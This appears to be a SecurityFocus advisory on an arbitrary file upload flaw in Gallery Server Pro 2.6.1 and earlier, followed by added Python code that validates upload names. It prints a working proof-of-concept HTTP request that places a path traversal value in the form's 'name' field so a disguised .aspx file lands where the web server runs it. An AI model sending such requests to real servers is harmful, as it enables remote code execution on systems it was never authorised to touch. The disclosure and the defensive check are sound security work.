source: https://www.securityfocus.com/bid/59831/info

Gallery Server Pro is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Gallery Server Pro 2.6.1 and prior are vulnerable.

*********************************************************************
POST /gallery/gs/handler/upload.ashx?aid=2 HTTP/1.1
Host: <vulnerablesite>
Referer: http://www.example.com/gallery/default.aspx?g=task_addobjects&aid=2
Content-Length: 73459
Content-Type: multipart/form-data; boundary=---------------------------41184676334
Cookie: <VALID COOKIE DATA>
Pragma: no-cache
Cache-Control: no-cache

-----------------------------41184676334
Content-Disposition: form-data; name="name"

..\..\gs\mediaobjects\Samples\malicious.aspx
-----------------------------41184676334
Content-Disposition: form-data; name="file"; filename="malicious.jpg"
Content-Type: application/octet-stream

Malicious code here.

-----------------------------41184676334--
*********************************************************************

The uploaded file will then be available on the affected server at:
http://www.example.com/gallery/gs/mediaobjects/Samples/malicious.aspx
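
In the request above, the file lands at the path and extension given in the "name" field, while the file part itself claims to be malicious.jpg. A server-side check of that field follows as an added example (not code from the advisory or from Gallery Server Pro). UPLOAD_ROOT, ALLOWED_EXT and the function names are assumptions, and Python's ntpath module is used so that Windows path rules apply on any OS.

```python
import ntpath  # Windows path semantics on any OS; the target is an ASP.NET app

# Assumed values for illustration; not Gallery Server Pro's real configuration.
UPLOAD_ROOT = r"C:\site\gallery\App_Data\_Temp"
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}


class RejectedUpload(ValueError):
    """Raised when a client-supplied upload name must not be used."""


def is_within(root, candidate):
    """True if candidate, after resolving dot segments, stays under root."""
    root_n = ntpath.normcase(ntpath.normpath(root))
    cand_n = ntpath.normcase(ntpath.normpath(candidate))
    return cand_n.startswith(root_n + "\\")


def resolve_upload_target(client_name, root=UPLOAD_ROOT):
    """Map the multipart "name" field to a write path, or raise RejectedUpload."""
    name = client_name.strip()
    # 1. Bare file name only: no separators, no drive, no NTFS stream suffix.
    if any(c in name for c in "\\/:"):
        raise RejectedUpload("name carries path components: %r" % client_name)
    # 2. The extension that lands on disk comes from this field, so allowlist it
    #    here rather than trusting the "filename" parameter of the file part.
    if ntpath.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise RejectedUpload("extension not allowed: %r" % client_name)
    # 3. Defense in depth: the resolved path must still be inside the root.
    target = ntpath.normpath(ntpath.join(root, name))
    if not is_within(root, target):
        raise RejectedUpload("resolved path escapes upload root")
    return target


def check(client_name):
    """Return 'accept' or the rejection reason for a candidate name."""
    try:
        resolve_upload_target(client_name)
        return "accept"
    except RejectedUpload as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed inputs; the second is the "name" value from the request above.
    for n in ("holiday.JPG", r"..\..\gs\mediaobjects\Samples\malicious.aspx",
              "malicious.aspx", "photo.jpg::$DATA"):
        print("%-50s %s" % (n, check(n)))
```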